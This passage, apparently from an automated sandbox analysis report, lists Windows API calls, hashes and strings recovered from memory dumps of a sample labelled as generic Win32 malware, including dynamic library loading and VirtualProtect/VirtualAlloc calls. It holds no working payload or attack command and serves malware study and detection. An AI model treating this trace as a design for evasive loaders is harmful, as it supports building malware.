                                                                                                                        • Opcode Fuzzy Hash: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                                                                                                                        • Instruction Fuzzy Hash: 46F06232A04520ABDB10BBA89A8DAEE62B5AF54314F11443FE502B71C1CAFC4D02976D
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                                                        • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                        • Instruction ID: 25953aab165e2e3bb2b5eb59dc1d6ee29197e23c9d0e5a802ce790cbbbfebc39
                                                                                                                        • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                                                                                        • Instruction Fuzzy Hash: 33F0F4B1D1060EDADB00DFA4C6497EFBBB4AB04309F04812AD941B6281D7B982488FA9
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401F01
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$EnableShow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1136574915-0
                                                                                                                        • Opcode ID: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                                                                                                                        • Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
                                                                                                                        • Opcode Fuzzy Hash: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                                                                                                                        • Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                                                          • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                                                          • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                                                                          • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2547128583-0
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00406015
                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                                                                          • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointerwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 327478801-0
                                                                                                                        APIs
                                                                                                                        • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PathSearch
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2203818243-0
                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(7059505C,00000004,00000040,7059504C), ref: 70592A9D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040641C,?,?,?,?,Call,?,00000000), ref: 004063B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 71445658-0
                                                                                                                        APIs
                                                                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        APIs
                                                                                                                        • SetDlgItemTextW.USER32(?,?,00000000), ref: 004044BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3367045223-0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        APIs
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00404299), ref: 004044CC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2492992576-0
                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000), ref: 70592C57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,?,705912DB,?,7059137F,00000019,705911CA,-000000A0), ref: 705912C5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocGlobal
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004049E0
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404A0A
                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404ABB
                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404AC6
                                                                                                                        • lstrcmpiW.KERNEL32(Call,00422F08,00000000,?,?), ref: 00404AF8
                                                                                                                        • lstrcatW.KERNEL32(?,Call), ref: 00404B04
                                                                                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B16
                                                                                                                          • Part of subcall function 00405B65: GetDlgItemTextW.USER32(?,?,00000400,00404B4D), ref: 00405B78
                                                                                                                          • Part of subcall function 004067CF: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                                                          • Part of subcall function 004067CF: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                                                          • Part of subcall function 004067CF: CharNextW.USER32(?,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe",76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                                                          • Part of subcall function 004067CF: CharPrevW.USER32(?,?,76343420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(00420ED8,?,?,0000040F,?,00420ED8,00420ED8,?,?,00420ED8,?,?,000003FB,?), ref: 00404BD9
                                                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BF4
                                                                                                                          • Part of subcall function 00404D4D: lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                                                                                          • Part of subcall function 00404D4D: wsprintfW.USER32 ref: 00404DF7
                                                                                                                          • Part of subcall function 00404D4D: SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: A$C:\Users\user\polaritets$Call
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 705912BB: GlobalAlloc.KERNELBASE(00000040,?,705912DB,?,7059137F,00000019,705911CA,-000000A0), ref: 705912C5
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70591D2D
                                                                                                                        • lstrcpyW.KERNEL32(00000008,?), ref: 70591D75
                                                                                                                        • lstrcpyW.KERNEL32(00000808,?), ref: 70591D7F
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70591D92
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70591E74
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70591E79
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 70591E7E
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70592068
                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 70592222
                                                                                                                        • GetModuleHandleW.KERNEL32(00000008), ref: 705922A1
                                                                                                                        • LoadLibraryW.KERNEL32(00000008), ref: 705922B2
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 7059230C
                                                                                                                        • lstrlenW.KERNEL32(00000808), ref: 70592326
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\polaritets, xrefs: 0040226E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInstance
                                                                                                                        • String ID: C:\Users\user\polaritets
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404F25
                                                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404F30
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F7A
                                                                                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F91
                                                                                                                        • SetWindowLongW.USER32(?,000000FC,0040551A), ref: 00404FAA
                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FBE
                                                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FD0
                                                                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404FE6
                                                                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FF2
                                                                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405004
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00405007
                                                                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405032
                                                                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040503E
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D9
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405109
                                                                                                                          • Part of subcall function 004044D5: SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040511D
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0040514B
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405159
                                                                                                                        • ShowWindow.USER32(?,00000005), ref: 00405169
                                                                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405264
                                                                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C9
                                                                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DE
                                                                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405302
                                                                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405322
                                                                                                                        • ImageList_Destroy.COMCTL32(?), ref: 00405337
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00405347
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053C0
                                                                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405469
                                                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405478
                                                                                                                        • InvalidateRect.USER32(?,00000000,?), ref: 004054A3
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 004054F1
                                                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 004054FC
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405503
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                        • String ID: $M$N
                                                                                                                        • API String ID: 2564846305-813528018
                                                                                                                        APIs
